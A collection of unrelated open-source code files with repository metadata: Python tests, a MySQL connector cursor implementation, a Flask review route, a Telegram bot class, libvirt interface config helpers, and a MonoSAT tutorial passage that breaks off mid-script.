(decorators.update, decorators.ResourceOperation, Method.PUT),
(decorators.patch, decorators.ResourceOperation, Method.PATCH),
(decorators.delete, decorators.Operation, Method.DELETE),
))
def test_endpoint_decorators(decorator, klass, method):
@decorator
def target(request):
pass
assert isinstance(target, klass)
assert target.methods == (method,)
class TestSecurity(object):
"""
Test the security definition
"""
def test_permissions(self):
@decorators.security('user', 'write:user', 'read:user')
def target(request):
pass
assert hasattr(target, 'security')
assert isinstance(target.security, decorators.Security)
assert target.security.name == 'user'
assert target.security.permissions == {'write:user', 'read:user'}
def test_to_swagger(self):
@decorators.security('user', 'write:user', 'read:user')
def target(request):
pass
actual = target.security.to_swagger()
assert isinstance(actual, dict)
assert len(actual) == 1
assert 'user' in actual
assert len(actual['user']) == 2
assert {'write:user', 'read:user'} == set(actual['user'])
|
{
"content_hash": "4de96fff00c46e73ddaad10c87632e51",
"timestamp": "",
"source": "github",
"line_count": 352,
"max_line_length": 121,
"avg_line_length": 32.76704545454545,
"alnum_prop": 0.5515866134905497,
"repo_name": "python-odin/odinweb",
"id": "0805657ffaf3c7b8721ae020d27ef4a706e15a56",
"size": "11534",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "tests/test_decorators.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "3186"
},
{
"name": "Python",
"bytes": "199028"
}
],
"symlink_target": ""
}
|
"""Cursor classes
"""
import weakref
import re
from . import errors
RE_SQL_COMMENT = re.compile("\/\*.*\*\/")
RE_SQL_INSERT_VALUES = re.compile(
r'VALUES\s*(\(\s*(?:%(?:\(.*\)|)s\s*(?:,|)\s*)+\))',
re.I | re.M)
RE_SQL_INSERT_STMT = re.compile(r'INSERT\s+INTO', re.I)
RE_PY_PARAM = re.compile(b'(%s)')
RE_SQL_SPLIT_STMTS = re.compile(
b''';(?=(?:[^"'`]*["'`][^"'`]*["'`])*[^"'`]*$)''')
class _ParamSubstitutor(object):
def __init__(self, params):
self.params = params
self.index = 0
def __call__(self, matchobj):
index = self.index
self.index += 1
try:
return self.params[index]
except IndexError:
raise errors.ProgrammingError(
"Not enough parameters for the SQL statement")
@property
def remaining(self):
return len(self.params) - self.index
class CursorBase(object):
"""
Base for defining MySQLCursor. This class is a skeleton and defines
methods and members as required for the Python Database API
Specification v2.0.
It's better to inherite from MySQLCursor.
"""
def __init__(self):
self._description = None
self._rowcount = -1
self._last_insert_id = None
self.arraysize = 1
def __del__(self):
self.close()
def callproc(self, procname, args=()):
pass
def close(self):
pass
def execute(self, operation, params=()):
pass
def executemany(self, operation, seqparams):
pass
def fetchone(self):
pass
def fetchmany(self, size=1):
pass
def fetchall(self):
pass
def nextset(self):
pass
def setinputsizes(self, sizes):
pass
def setoutputsize(self, size, column=None):
pass
def reset(self):
pass
@property
def description(self):
"""Returns description of columns in a result
This property returns a list of tuples describing the columns in
in a result set. A tuple is described as follows::
(column_name,
type,
None,
None,
None,
None,
null_ok,
column_flags) # Addition to PEP-249 specs
Returns a list of tuples.
"""
return self._description
@property
def rowcount(self):
"""Returns the number of rows produced or affected
This property returns the number of rows produced by queries
such as a SELECT, or affected rows when executing DML statements
like INSERT or UPDATE.
Note that for non-buffered cursors it is impossible to know the
number of rows produced before having fetched them all. For those,
the number of rows will be -1 right after execution, and
incremented when fetching rows.
Returns an integer.
"""
return self._rowcount
@property
def lastrowid(self):
"""Returns the value generated for an AUTO_INCREMENT column
Returns the value generated for an AUTO_INCREMENT column by
the previous INSERT or UPDATE statement or None when there is
no such value available.
Returns a long value or None.
"""
return self._last_insert_id
class MySQLCursor(CursorBase):
"""Default cursor for interacting with MySQL
This cursor will execute statements and handle the result. It will
not automatically fetch all rows.
MySQLCursor should be inherited whenever other functionallity is
required. An example would to change the fetch* member functions
to return dictionaries instead of lists of values.
Implements the Python Database API Specification v2.0 (PEP-249)
"""
def __init__(self, connection=None):
CursorBase.__init__(self)
self._connection = None
self._stored_results = []
self._nextrow = (None, None)
self._warnings = None
self._warning_count = 0
self._executed = None
self._executed_list = []
if connection is not None:
self._set_connection(connection)
def __iter__(self):
"""
Iteration over the result set which calls self.fetchone()
and returns the next row.
"""
return iter(self.fetchone, None)
def _set_connection(self, connection):
try:
self._connection = weakref.proxy(connection)
self._connection._protocol
except (AttributeError, TypeError):
raise errors.InterfaceError(errno=2048)
def _reset_result(self):
self._rowcount = -1
self._nextrow = (None, None)
self._stored_results = []
self._warnings = None
self._warning_count = 0
self._description = None
self._executed = None
self._executed_list = []
self.reset()
def _have_unread_result(self):
"""Check whether there is an unread result"""
try:
return self._connection.unread_result
except AttributeError:
return False
def next(self):
return self.__next__(self)
def __next__(self):
"""
Used for iterating over the result set. Calles self.fetchone()
to get the next row.
"""
try:
row = self.fetchone()
except errors.InterfaceError:
raise StopIteration
if not row:
raise StopIteration
return row
def close(self):
"""Close the cursor
Returns True when successful, otherwise False.
"""
if self._connection is None:
return False
self._reset_result()
self._connection = None
return True
def _process_params_dict(self, params):
try:
to_mysql = self._connection.converter.to_mysql
escape = self._connection.converter.escape
quote = self._connection.converter.quote
res = {}
for k,v in list(params.items()):
c = v
c = to_mysql(c)
c = escape(c)
c = quote(c)
res["%({})s".format(k).encode()] = c
except Exception as e:
raise errors.ProgrammingError(
"Failed processing pyformat-parameters; %s" % e)
else:
return res
return None
def _process_params(self, params):
"""
Process the parameters which were given when self.execute() was
called. It does following using the MySQLConnection converter:
* Convert Python types to MySQL types
* Escapes characters required for MySQL.
* Quote values when needed.
Returns a list.
"""
try:
res = params
to_mysql = self._connection.converter.to_mysql
escape = self._connection.converter.escape
quote = self._connection.converter.quote
res = list(map(to_mysql,res))
res = list(map(escape,res))
res = list(map(quote,res))
except Exception as e:
raise errors.ProgrammingError(
"Failed processing format-parameters; %s" % e)
else:
return tuple(res)
return None
def _row_to_python(self, rowdata, desc=None):
res = ()
try:
if not desc:
desc = self.description
for idx,v in enumerate(rowdata):
flddsc = desc[idx]
res += (self._connection.converter.to_python(flddsc, v),)
except Exception as e:
raise errors.InterfaceError(
"Failed converting row to Python types; %s" % e)
else:
return res
return None
def _handle_noresultset(self, res):
"""Handles result of execute() when there is no result set
"""
try:
self._rowcount = res['affected_rows']
self._last_insert_id = res['insert_id']
self._warning_count = res['warning_count']
except (KeyError, TypeError) as err:
raise errors.ProgrammingError(
"Failed handling non-resultset; {}".format(err))
if self._connection.get_warnings is True and self._warning_count:
self._warnings = self._fetch_warnings()
def _handle_resultset(self):
pass
def _handle_result(self, result):
"""
Handle the result after a command was send. The result can be either
an OK-packet or a dictionary containing column/eof information.
Raises InterfaceError when result is not a dict() or result is
invalid.
"""
if not isinstance(result, dict):
raise errors.InterfaceError('Result was not a dict()')
if 'columns' in result:
# Weak test, must be column/eof information
self._description = result['columns']
self._connection.unread_result = True
self._handle_resultset()
elif 'affected_rows' in result:
# Weak test, must be an OK-packet
self._connection.unread_result = False
self._handle_noresultset(result)
else:
raise errors.InterfaceError('Invalid result')
def _execute_iter(self, query_iter):
"""Generator returns MySQLCursor objects for multiple statements
This method is only used when multiple statements are executed
by the execute() method. It uses zip() to make an iterator from the
given query_iter (result of MySQLConnection.cmd_query_iter()) and
the list of statements that were executed.
"""
if not self._executed_list:
self._executed_list = RE_SQL_SPLIT_STMTS.split(self._executed)
for result, stmt in zip(query_iter, iter(self._executed_list)):
self._reset_result()
self._handle_result(result)
self._executed = stmt
yield self
def execute(self, operation, params=None, multi=False):
"""Executes the given operation
Executes the given operation substituting any markers with
the given parameters.
For example, getting all rows where id is 5:
cursor.execute("SELECT * FROM t1 WHERE id = %s", (5,))
The multi argument should be set to True when executing multiple
statements in one operation. If not set and multiple results are
found, an InterfaceError will be raised.
If warnings where generated, and connection.get_warnings is True, then
self._warnings will be a list containing these warnings.
Returns an iterator when multi is True, otherwise None.
"""
if not operation:
return
if self._connection.unread_result is True:
raise errors.InternalError("Unread result found.")
self._reset_result()
stmt = ''
try:
if not isinstance(operation, bytes):
stmt = operation.encode(self._connection.charset)
else:
stmt = operation
except (UnicodeDecodeError, UnicodeEncodeError) as e:
raise errors.ProgrammingError(str(e))
if params is not None:
if isinstance(params, dict):
for k,v in self._process_params_dict(params).items():
stmt = stmt.replace(k, v, 1)
elif isinstance(params, (list, tuple)):
psub = _ParamSubstitutor(self._process_params(params))
stmt = RE_PY_PARAM.sub(psub, stmt)
if psub.remaining != 0:
raise errors.ProgrammingError(
"Not all parameters were used in the SQL statement")
if multi:
self._executed = stmt
self._executed_list = []
return self._execute_iter(self._connection.cmd_query_iter(stmt))
else:
self._executed = stmt
try:
self._handle_result(self._connection.cmd_query(stmt))
except errors.InterfaceError as err:
if self._connection._have_next_result:
raise errors.InterfaceError(
"Use multi=True when executing multiple statements")
raise
return None
def _batch_insert(self, operation, seq_params):
opnocom = re.sub(RE_SQL_COMMENT,'',operation)
m = re.search(RE_SQL_INSERT_VALUES,opnocom)
fmt = m.group(1).encode(self._connection.charset)
values = []
try:
stmt = operation.encode(self._connection.charset)
for params in seq_params:
tmp = fmt
if isinstance(params,dict):
for k,v in self._process_params_dict(params).items():
tmp = tmp.replace(k,v,1)
else:
psub = _ParamSubstitutor(self._process_params(params))
tmp = RE_PY_PARAM.sub(psub,tmp)
if psub.remaining != 0:
raise errors.ProgrammingError("Not all parameters "
"were used in the SQL statement")
#for p in self._process_params(params):
# tmp = tmp.replace(b'%s',p,1)
values.append(tmp)
stmt = stmt.replace(fmt,b','.join(values),1)
return self.execute(stmt)
except (UnicodeDecodeError,UnicodeEncodeError) as e:
raise errors.ProgrammingError(str(e))
except errors.Error:
raise
except Exception as e:
raise errors.InterfaceError(
"Failed executing the operation; %s" % e)
else:
self._executed = stmt
return self._rowcount
def executemany(self, operation, seq_params):
"""Execute the given operation multiple times
The executemany() method will execute the operation iterating
over the list of parameters in seq_params.
Example: Inserting 3 new employees and their phone number
data = [
('Jane','555-001'),
('Joe', '555-001'),
('John', '555-003')
]
stmt = "INSERT INTO employees (name, phone) VALUES ('%s','%s)"
cursor.executemany(stmt, data)
INSERT statements are optimized by batching the data, that is
using the MySQL multiple rows syntax.
Results are discarded. If they are needed, consider looping over
data using the execute() method.
"""
if not operation:
return
if self._connection.unread_result is True:
raise errors.InternalError("Unread result found.")
if not isinstance(seq_params, (list,tuple)):
raise errors.ProgrammingError(
"Parameters for query must be list or tuple.")
# Optimize INSERTs by batching them
if re.match(RE_SQL_INSERT_STMT,operation):
return self._batch_insert(operation,seq_params)
rowcnt = 0
try:
for params in seq_params:
self.execute(operation, params)
if self.with_rows and self._have_unread_result():
self.fetchall()
rowcnt += self._rowcount
except (ValueError, TypeError) as err:
raise errors.InterfaceError(
"Failed executing the operation; {}".format(err))
except:
# Raise whatever execute() raises
raise
self._rowcount = rowcnt
def stored_results(self):
"""Returns an iterator for stored results
This method returns an iterator over results which are stored when
callproc() is called. The iterator will provide MySQLCursorBuffered
instances.
Returns a iterator.
"""
return iter(self._stored_results)
def callproc(self, procname, args=()):
"""Calls a stored procedue with the given arguments
The arguments will be set during this session, meaning
they will be called like _<procname>__arg<nr> where
<nr> is an enumeration (+1) of the arguments.
Coding Example:
1) Definining the Stored Routine in MySQL:
CREATE PROCEDURE multiply(IN pFac1 INT, IN pFac2 INT, OUT pProd INT)
BEGIN
SET pProd := pFac1 * pFac2;
END
2) Executing in Python:
args = (5,5,0) # 0 is to hold pprod
cursor.callproc('multiply', args)
print cursor.fetchone()
Does not return a value, but a result set will be
available when the CALL-statement execute successfully.
Raises exceptions when something is wrong.
"""
if not procname or not isinstance(procname, str):
raise ValueError("procname must be a string")
if not isinstance(args, (tuple, list)):
raise ValueError("args must be a sequence")
argfmt = "@_%s_arg%d"
self._stored_results = []
results = []
try:
argnames = []
if args:
for idx,arg in enumerate(args):
argname = argfmt % (procname, idx+1)
argnames.append(argname)
self.execute("SET {0}=%s".format(argname), (arg,))
call = "CALL %s(%s)" % (procname,','.join(argnames))
for result in self._connection.cmd_query_iter(call):
if 'columns' in result:
tmp = MySQLCursorBuffered(self._connection._get_self())
tmp._handle_result(result)
results.append(tmp)
if argnames:
select = "SELECT %s" % ','.join(argnames)
self.execute(select)
self._stored_results = results
return self.fetchone()
else:
self._stored_results = results
return ()
except errors.Error:
raise
except Exception as e:
raise errors.InterfaceError(
"Failed calling stored routine; %s" % e)
def getlastrowid(self):
"""Returns the value generated for an AUTO_INCREMENT column
Returns the value generated for an AUTO_INCREMENT column by
the previous INSERT or UPDATE statement.
Returns a long value or None.
"""
return self._last_insert_id
def _fetch_warnings(self):
"""
Fetch warnings doing a SHOW WARNINGS. Can be called after getting
the result.
Returns a result set or None when there were no warnings.
"""
res = []
try:
c = self._connection.cursor()
cnt = c.execute("SHOW WARNINGS")
res = c.fetchall()
c.close()
except Exception as e:
raise errors.InterfaceError(
"Failed getting warnings; %s" % e)
if self._connection.raise_on_warnings is True:
msg = '; '.join([ "(%s) %s" % (r[1],r[2]) for r in res])
raise errors.get_mysql_exception(res[0][1],res[0][2])
else:
if len(res):
return res
return None
def _handle_eof(self, eof):
self._connection.unread_result = False
self._nextrow = (None, None)
self._warning_count = eof['warning_count']
if self._connection.get_warnings is True and eof['warning_count']:
self._warnings = self._fetch_warnings()
def _fetch_row(self):
if self._have_unread_result() is False:
return None
row = None
try:
if self._nextrow == (None, None):
(row, eof) = self._connection.get_row()
else:
(row, eof) = self._nextrow
if row:
(foo, eof) = self._nextrow = self._connection.get_row()
if eof is not None:
self._handle_eof(eof)
if self._rowcount == -1:
self._rowcount = 1
else:
self._rowcount += 1
if eof:
self._handle_eof(eof)
except:
raise
else:
return row
return None
def fetchwarnings(self):
return self._warnings
def fetchone(self):
row = self._fetch_row()
if row:
return self._row_to_python(row)
return None
def fetchmany(self,size=None):
res = []
cnt = (size or self.arraysize)
while cnt > 0 and self._have_unread_result():
cnt -= 1
row = self.fetchone()
if row:
res.append(row)
return res
def fetchall(self):
if not self._have_unread_result():
raise errors.InterfaceError("No result set to fetch from.")
res = []
(rows, eof) = self._connection.get_rows()
self._rowcount = len(rows)
for i in range(0, self._rowcount):
res.append(self._row_to_python(rows[i]))
self._handle_eof(eof)
return res
@property
def column_names(self):
"""Returns column names
This property returns the columns names as a tuple.
Returns a tuple.
"""
if not self.description:
return ()
return tuple( [d[0] for d in self.description] )
@property
def statement(self):
"""Returns the executed statement
This property returns the executed statement. When multiple
statements were executed, the current statement in the iterator
will be returned.
"""
try:
return self._executed.strip().decode('utf8')
except AttributeError:
return self._executed.strip()
@property
def with_rows(self):
"""Returns whether the cursor could have rows returned
This property returns True when column descriptions are available
and possibly also rows, which will need to be fetched.
Returns True or False.
"""
if not self.description:
return False
return True
def __str__(self):
fmt = "MySQLCursor: %s"
if self._executed:
executed = self._executed.decode('utf-8')
if len(executed) > 30:
res = fmt % (executed[:30] + '..')
else:
res = fmt % (executed)
else:
res = fmt % '(Nothing executed yet)'
return res
class MySQLCursorBuffered(MySQLCursor):
"""Cursor which fetches rows within execute()"""
def __init__(self, connection=None):
MySQLCursor.__init__(self, connection)
self._rows = None
self._next_row = 0
def _handle_resultset(self):
(self._rows, eof) = self._connection.get_rows()
self._rowcount = len(self._rows)
self._handle_eof(eof)
self._next_row = 0
try:
self._connection.unread_result = False
except:
pass
def reset(self):
self._rows = None
def _fetch_row(self):
row = None
try:
row = self._rows[self._next_row]
except:
return None
else:
self._next_row += 1
return row
return None
def fetchall(self):
if self._rows is None:
raise errors.InterfaceError("No result set to fetch from.")
res = []
for row in self._rows:
res.append(self._row_to_python(row))
self._next_row = len(self._rows)
return res
def fetchmany(self,size=None):
res = []
cnt = (size or self.arraysize)
while cnt > 0:
cnt -= 1
row = self.fetchone()
if row:
res.append(row)
return res
@property
def with_rows(self):
return self._rows is not None
class MySQLCursorRaw(MySQLCursor):
def fetchone(self):
row = self._fetch_row()
if row:
return row
return None
def fetchall(self):
if not self._have_unread_result():
raise errors.InterfaceError("No result set to fetch from.")
(rows, eof) = self._connection.get_rows()
self._rowcount = len(rows)
self._handle_eof(eof)
return rows
class MySQLCursorBufferedRaw(MySQLCursorBuffered):
def fetchone(self):
row = self._fetch_row()
if row:
return row
return None
def fetchall(self):
if self._rows is None:
raise errors.InterfaceError("No result set to fetch from.")
return [ r for r in self._rows ]
@property
def with_rows(self):
return self._rows is not None
|
{
"content_hash": "e6e6998a431f75c0bbd6bad73a3bf1d6",
"timestamp": "",
"source": "github",
"line_count": 800,
"max_line_length": 78,
"avg_line_length": 31.995,
"alnum_prop": 0.5406704172526957,
"repo_name": "rcosnita/fantastico",
"id": "213b98451a44873051c5ec8719f4f669249aa691",
"size": "26726",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "virtual_env/libs/mysql-connector/python3/mysql/connector/cursor.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "6802"
},
{
"name": "Python",
"bytes": "2168052"
},
{
"name": "Shell",
"bytes": "13309"
}
],
"symlink_target": ""
}
|
from flask import Blueprint, render_template, g
from sqlakeyset import get_page # type: ignore
from sqlakeyset.results import s as sqlakeysetserial # type: ignore
from sqlalchemy import desc, asc, or_
from bouncer.constants import READ # type: ignore
from app.auth.acls import requires
from app.vulnerability.views.vulncode_db import VulnViewTypesetPaginationObjectWrapper
from data.models import Vulnerability, Nvd
from data.models.nvd import default_nvd_view_options
from data.models.vulnerability import VulnerabilityState
from data.database import DEFAULT_DATABASE
from lib.utils import parse_pagination_param
bp = Blueprint("review", __name__, url_prefix="/review")
db = DEFAULT_DATABASE
def serialize_enum(val):
return "s", val.name
def unserialize_enum(val):
return val
sqlakeysetserial.custom_serializations = {VulnerabilityState: serialize_enum}
sqlakeysetserial.custom_unserializations = {VulnerabilityState: unserialize_enum}
def get_pending_proposals_paged():
entries = db.session.query(Vulnerability, Nvd)
entries = entries.filter(Vulnerability.state != VulnerabilityState.PUBLISHED)
entries = entries.outerjoin(Vulnerability, Nvd.cve_id == Vulnerability.cve_id)
entries = entries.order_by(asc(Vulnerability.state), desc(Nvd.id))
bookmarked_page = parse_pagination_param("review_p")
per_page = 10
entries_full = entries.options(default_nvd_view_options)
review_vulns = get_page(entries_full, per_page, page=bookmarked_page)
review_vulns = VulnViewTypesetPaginationObjectWrapper(review_vulns.paging)
return review_vulns
def get_reviewed_proposals_paged():
entries = db.session.query(Vulnerability, Nvd)
entries = entries.filter(
or_(
Vulnerability.state == VulnerabilityState.PUBLISHED,
Vulnerability.state == VulnerabilityState.REVIEWED,
Vulnerability.state == VulnerabilityState.ARCHIVED,
),
Vulnerability.reviewer == g.user,
)
entries = entries.outerjoin(Vulnerability, Nvd.cve_id == Vulnerability.cve_id)
entries = entries.order_by(asc(Vulnerability.state), desc(Nvd.id))
bookmarked_page = parse_pagination_param("reviewed_p")
per_page = 10
entries_full = entries.options(default_nvd_view_options)
review_vulns = get_page(entries_full, per_page, page=bookmarked_page)
review_vulns = VulnViewTypesetPaginationObjectWrapper(review_vulns.paging)
return review_vulns
# Create a catch all route for profile identifiers.
@bp.route("/list")
@requires(READ, "Proposal")
def review_list():
review_vulns = get_pending_proposals_paged()
reviewed_vulns = get_reviewed_proposals_paged()
return render_template(
"review/list.html", review_vulns=review_vulns, reviewed_vulns=reviewed_vulns
)
|
{
"content_hash": "afc670959a5247b48937f8bccc4e19af",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 86,
"avg_line_length": 38.69444444444444,
"alnum_prop": 0.7458722182340273,
"repo_name": "google/vulncode-db",
"id": "fa8cde4ae55c63158c8c31d5259c2bc65e281898",
"size": "3362",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/review/routes.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "9158"
},
{
"name": "Dockerfile",
"bytes": "2347"
},
{
"name": "HTML",
"bytes": "170436"
},
{
"name": "JavaScript",
"bytes": "139947"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "411821"
},
{
"name": "Shell",
"bytes": "19617"
}
],
"symlink_target": ""
}
|
from telebot import TeleBot, types
class TululBot(TeleBot):
def __init__(self, token):
super(TululBot, self).__init__(token)
self._user = None
@property
def user(self):
if self._user is not None:
return self._user
self._user = self.get_me()
return self._user
@user.setter
def user(self, value):
self._user = value
def reply_to(self, *args, **kwargs):
try:
force_reply = kwargs.pop('force_reply')
except KeyError:
return super(TululBot, self).reply_to(*args, **kwargs)
else:
if force_reply:
kwargs['reply_markup'] = types.ForceReply(selective=True)
return super(TululBot, self).reply_to(*args, **kwargs)
def create_is_reply_to_filter(self, text):
def is_reply_to_bot(message):
return (self.is_reply_to_bot_user(message) and
message.reply_to_message.text == text)
return is_reply_to_bot
def is_reply_to_bot_user(self, message):
replied_message = message.reply_to_message
return (replied_message is not None and
replied_message.from_user is not None and
replied_message.from_user.id == self.user.id)
|
{
"content_hash": "b5be7a3eeceb7750c19db60737fb0166",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 73,
"avg_line_length": 29.837209302325583,
"alnum_prop": 0.5752143413873734,
"repo_name": "tulul/tululbot",
"id": "2b1bee728056ef01d96cda8e68c6c41913c38808",
"size": "1283",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tululbot/utils/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "46076"
}
],
"symlink_target": ""
}
|
"""
Policy based configuration of libvirt objects
This module provides helper APIs for populating the config.py
classes based on common operational needs / policies
"""
import six
from nova.pci import utils as pci_utils
def set_vif_guest_frontend_config(conf, mac, model, driver, queues=None):
"""Populate a LibvirtConfigGuestInterface instance
with guest frontend details.
"""
conf.mac_addr = mac
if model is not None:
conf.model = model
if driver is not None:
conf.driver_name = driver
if queues is not None:
conf.vhost_queues = queues
def set_vif_host_backend_bridge_config(conf, brname, tapname=None):
"""Populate a LibvirtConfigGuestInterface instance
with host backend details for a software bridge.
"""
conf.net_type = "bridge"
conf.source_dev = brname
if tapname:
conf.target_dev = tapname
def set_vif_host_backend_ethernet_config(conf, tapname):
"""Populate a LibvirtConfigGuestInterface instance
with host backend details for an externally configured
host device.
NB use of this configuration is discouraged by
libvirt project and will mark domains as 'tainted'.
"""
conf.net_type = "ethernet"
conf.target_dev = tapname
conf.script = ""
def set_vif_host_backend_ovs_config(conf, brname, interfaceid, tapname=None):
"""Populate a LibvirtConfigGuestInterface instance
with host backend details for an OpenVSwitch bridge.
"""
conf.net_type = "bridge"
conf.source_dev = brname
conf.vporttype = "openvswitch"
conf.add_vport_param("interfaceid", interfaceid)
if tapname:
conf.target_dev = tapname
def set_vif_host_backend_802qbg_config(conf, devname, managerid,
typeid, typeidversion,
instanceid, tapname=None):
"""Populate a LibvirtConfigGuestInterface instance
with host backend details for an 802.1qbg device.
"""
conf.net_type = "direct"
conf.source_dev = devname
conf.source_mode = "vepa"
conf.vporttype = "802.1Qbg"
conf.add_vport_param("managerid", managerid)
conf.add_vport_param("typeid", typeid)
conf.add_vport_param("typeidversion", typeidversion)
conf.add_vport_param("instanceid", instanceid)
if tapname:
conf.target_dev = tapname
def set_vif_host_backend_802qbh_config(conf, net_type, devname, profileid,
tapname=None):
"""Populate a LibvirtConfigGuestInterface instance
with host backend details for an 802.1qbh device.
"""
conf.net_type = net_type
if net_type == 'direct':
conf.source_mode = 'passthrough'
conf.source_dev = pci_utils.get_ifname_by_pci_address(devname)
conf.driver_name = 'vhost'
else:
conf.source_dev = devname
conf.model = None
conf.vporttype = "802.1Qbh"
conf.add_vport_param("profileid", profileid)
if tapname:
conf.target_dev = tapname
def set_vif_host_backend_hw_veb(conf, net_type, devname, vlan,
tapname=None):
"""Populate a LibvirtConfigGuestInterface instance
with host backend details for an device that supports hardware
virtual ethernet bridge.
"""
conf.net_type = net_type
if net_type == 'direct':
conf.source_mode = 'passthrough'
conf.source_dev = pci_utils.get_ifname_by_pci_address(devname)
conf.driver_name = 'vhost'
else:
conf.source_dev = devname
conf.model = None
conf.vlan = vlan
if tapname:
conf.target_dev = tapname
def set_vif_host_backend_hostdev_pci_config(conf, pci_slot):
"""Populate a LibvirtConfigGuestHostdev instance with pci address data."""
conf.domain, conf.bus, conf.slot, conf.function = (
pci_utils.get_pci_address_fields(pci_slot))
def set_vif_host_backend_direct_config(conf, devname, mode="passthrough"):
"""Populate a LibvirtConfigGuestInterface instance
with direct Interface.
"""
conf.net_type = "direct"
conf.source_mode = mode
conf.source_dev = devname
conf.model = "virtio"
def set_vif_host_backend_vhostuser_config(conf, mode, path):
"""Populate a LibvirtConfigGuestInterface instance
with host backend details for vhostuser socket.
"""
conf.net_type = "vhostuser"
conf.vhostuser_type = "unix"
conf.vhostuser_mode = mode
conf.vhostuser_path = path
def set_vif_bandwidth_config(conf, inst_type):
"""Config vif inbound/outbound bandwidth limit. parameters are
set in instance_type_extra_specs table, key is in the format
quota:vif_inbound_average.
"""
bandwidth_items = ['vif_inbound_average', 'vif_inbound_peak',
'vif_inbound_burst', 'vif_outbound_average', 'vif_outbound_peak',
'vif_outbound_burst']
for key, value in six.iteritems(inst_type.get('extra_specs', {})):
scope = key.split(':')
if len(scope) > 1 and scope[0] == 'quota':
if scope[1] in bandwidth_items:
setattr(conf, scope[1], value)
|
{
"content_hash": "02010746a43efc5eafe290d1102a25df",
"timestamp": "",
"source": "github",
"line_count": 163,
"max_line_length": 78,
"avg_line_length": 31.34355828220859,
"alnum_prop": 0.6572714816989627,
"repo_name": "cernops/nova",
"id": "2522efee43287289bb6dadf86f1c48390363ebd1",
"size": "5719",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "nova/virt/libvirt/designer.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "983"
},
{
"name": "JavaScript",
"bytes": "2639"
},
{
"name": "Python",
"bytes": "17413087"
},
{
"name": "Shell",
"bytes": "36658"
},
{
"name": "Smarty",
"bytes": "295563"
}
],
"symlink_target": ""
}
|
from reobject.query.parser import Q
from reobject.query.queryset import EmptyQuerySet
from reobject.query.queryset import QuerySet
|
{
"content_hash": "62ba050d3bb6e7ce37348dccf76940bb",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 49,
"avg_line_length": 43.666666666666664,
"alnum_prop": 0.8625954198473282,
"repo_name": "onyb/reobject",
"id": "fd8670cbf936d2e0ee6ca654f42c74a27ea85b6c",
"size": "131",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "reobject/query/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "41394"
},
{
"name": "Shell",
"bytes": "145"
}
],
"symlink_target": ""
}
|
import math
def distance(dorf1, dorf2):
"""
Erwartet als Parameter zwei Dörfer und gibt ihre Distanz zurück.
"""
distance = math.sqrt((dorf1.x-dorf2.x)**2 + (dorf1.y-dorf2.y)**2)
return distance
def colorprint(string, color='blue'):
"""
Prettifies output.
Makes debugging fun again.
usage:
>>> colorprint('test', 'magenta')
:param string: Just a string you want to have printed.
:type string: string, obviously
:param color: the color you want to use.
:type color: string
guideline:
red: something went wrong / is bad...
yellow: trying to fix something.
green: fixed something.
blue: important, but of recurring events.
turq: important, but often recurring events.
magenta: something special has happened.
white: everything as usual. not of particular interest.
"""
colors = {'red': 31, 'green': 32, 'yellow': 33, 'blue': 34, 'magenta': 35, 'turq': 36, 'white': 37}
print("\033[%sm%s\033[0m" % (colors[color], string))
|
{
"content_hash": "60921fa775cdd84020a861a9ec20ce4d",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 103,
"avg_line_length": 25.170731707317074,
"alnum_prop": 0.6395348837209303,
"repo_name": "erstis-go-botting/TouchOfBob",
"id": "86ee3f50a142c8b80e0509fdec43170ebde5d117",
"size": "1164",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "toolbox/tools.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "47968"
}
],
"symlink_target": ""
}
|
from monosat import *
#Create two Boolean variables:
a = Var()
b = Var()
# c is true if a is true or b is false, and false otherwise
c = Or(a, Not(b))
#Add a unit clause to the solver, asserting that variable c must be true
Assert(c)
#Solve the instance in MonoSAT, returning either True if the instance is SAT, and False if it is UNSAT
result = Solve()
if result:
print("SAT")
#After a satisfiable call to Solve(), you can query the assignments given by the solver to
#individual variables using v.value()
print("a: " + str(a.value()))
print("b: " + str(b.value()))
print("c: " + str(c.value()))
else:
print("UNSAT")
# After a solve call, you can continue making further assertions, creating new variables,
# and making incremental calls to the solver
d= Var()
Assert(Implies(d, Or(a,b)))
# There are also assertion forms for the common logic constructions, which are slightly more efficient than creating a
# new literal and asserting it to true. An equivalent way to accomplish the above would have been:
AssertImplies(d, Or(a,b))
# Note that d does not yet have an assignment in the solver, and so d.value() will return None until the next solve call
print("Variable 'd' is unassigned, and so has value " + str(d.value()))
result = Solve()
if result:
print("SAT")
print("a: " + str(a.value()))
print("b: " + str(b.value()))
print("c: " + str(c.value()))
print("d: " + str(d.value())) # now d is assigned
else:
print("UNSAT")
#You can use the '~' operator to apply negation, the same way as Not()
Assert(~(And(a, b)))
result = Solve()
if result:
print("SAT")
print("a: " + str(a.value()))
print("b: " + str(b.value()))
print("c: " + str(c.value()))
print("d: " + str(d.value()))
else:
print("UNSAT")
#There is no way to remove assertions from MonoSAT yet, however, you can use assumptions to
#temporarily assert that a variable must be true (or false):
result = Solve([b])
if result:
print("SAT")
print("a: " + str(a.value()))
print("b: " + str(b.value()))
print("c: " + str(c.value()))
print("d: " + str(d.value()))
else:
print("Temporarily UNSAT, under the assumption that 'b' is true")
#If in the previous call, MonoSAT was only UNSAT under an assumption, the solver can still be used in subsequent calls:
result = Solve([~b])
if result:
